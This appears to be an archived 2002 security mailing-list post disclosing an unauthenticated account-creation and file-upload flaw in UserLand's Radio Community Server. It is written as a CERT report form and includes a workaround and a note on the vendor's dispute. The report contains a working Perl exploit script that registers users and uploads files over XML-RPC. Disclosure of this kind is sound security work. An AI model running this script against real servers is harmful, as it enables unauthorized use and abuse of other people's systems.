OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Gerhard Poul (gpoul_at_EUNET.AT)
Date: Sun Jul 07 2002 - 10:34:36 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi,

    This is a vulnerability Andreas and I found about eight weeks ago. This
    was then first reported to the vendor and CERT. CERT received it on
    5/10/02 at 8:01pm. They haven't yet done anything with it as far as I
    can tell. - I haven't received anything from them except for the
    automated responses.

    I've attached the same description here that I also sent to CERT.
     
    Best regards,
    Gerhard Poul

    CONTACT INFORMATION
    ========================================================================
    =======

     Name : Gerhard Poul, Andreas Bolka
     E-mail : gpoul at eunet.at, andreas.bolka at gmx.net
     Phone / fax : [removed]
     Affiliation and address:

    Have you reported this to the vendor? [yes/no] yes.

            If so, please let us know whom you've contacted:

            Date of your report : 5/9/02
            Vendor contact name : Dave Winer
            Vendor contact phone :
            Vendor contact e-mail : daveuserland.com
            Vendor reference number :

    POLICY INFO
    ========================================================================
    =======

            ___ Do not release my identity to your vendor contact.

    TECHNICAL INFO
    ========================================================================
    =======
    If there is a CERT Vulnerability tracking number please put it here
    (otherwise leave blank): VU#______.

    Please describe the vulnerability.
    ---------------------------------

    This vulnerability makes it possible for an intruder to use the open
    SOAP or XML-RPC APIs published at
    http://www.soapware.org/xmlStorageSystem to create user accounts and
    upload random file data to any server running the Radio Community Server
    as published by UserLand Software Inc. at http://rcs.userland.com

    What is the impact of this vulnerability?
    ----------------------------------------

       a) What is the specific impact:

    Intruders can publish public files on a server without any special user
    permission over a network. - You don't need a user account or anything
    else on the target machine to make this work.

       b) How would you envision it being used in an attack scenario:

    This vulnerability enables attackers to publicly post files on any
    machine running the vulnerable software package.

    To your knowledge is the vulnerability currently being exploited?
    ----------------------------------------------------------------
            [yes/no] no.

    If there is an exploitation script available, please include it here.
    --------------------------------------------------------------------

    #!/usr/bin/perl

    use Frontier::Client;
    use MIME::Base64 qw(encode_base64);

    local($/) = undef; # slurp
    $email = "Johntest.com";
    $name = "John Doe";
    $password = "whateveryouwant.com";
    $filename = $ARGV[0];

    $server = Frontier::Client->new( 'url' => 'http://radiohost/RPC2',
                                     'debug' => 0 );
    $file = $server->base64(encode_base64(<>));
    $result = $server->call("xmlStorageSystem.registerUser", $email, $name,
    $password, 81, 0, 0); $usernum = $result->{'usernum'}; $result =
    $server->call("xmlStorageSystem.saveMultipleFiles", $usernum,
                            $password, [ $filename ], [ $file ]); $filename
    = $result->{'urlList'}->[0]; print "New user with ID $usernum has been
    created\n"; print "File has been uploaded to URI: $filename\n";

    Do you know what systems and/or configurations are vulnerable?
    -------------------------------------------------------------
            [yes/no] no.

            System :
            OS version :
            Verified/Guessed:

    Are you aware of any workarounds and/or fixes for this vulnerability?
    --------------------------------------------------------------------
            [yes/no] yes.

    There is a setting in the RCS software that restricts remote new user
    registrations. - By turning these remote registrations off, which are on
    by default, you can work around this problem but it will also restrict
    the usefulness of the community server.

    OTHER INFORMATION
    ========================================================================
    ===

    This vulnerability is an inherent design flaw of the xmlStorageSystem
    XML-RPC or SOAP interface used between a Radio Client and a Radio
    Community Server. - It has to be fixed in the specification first to
    design a secure solution and every customer should be advised to
    shutdown their Radio Community Servers immediately.

    The vendor has been contacted but does not agree with our vulnerability
    analysis.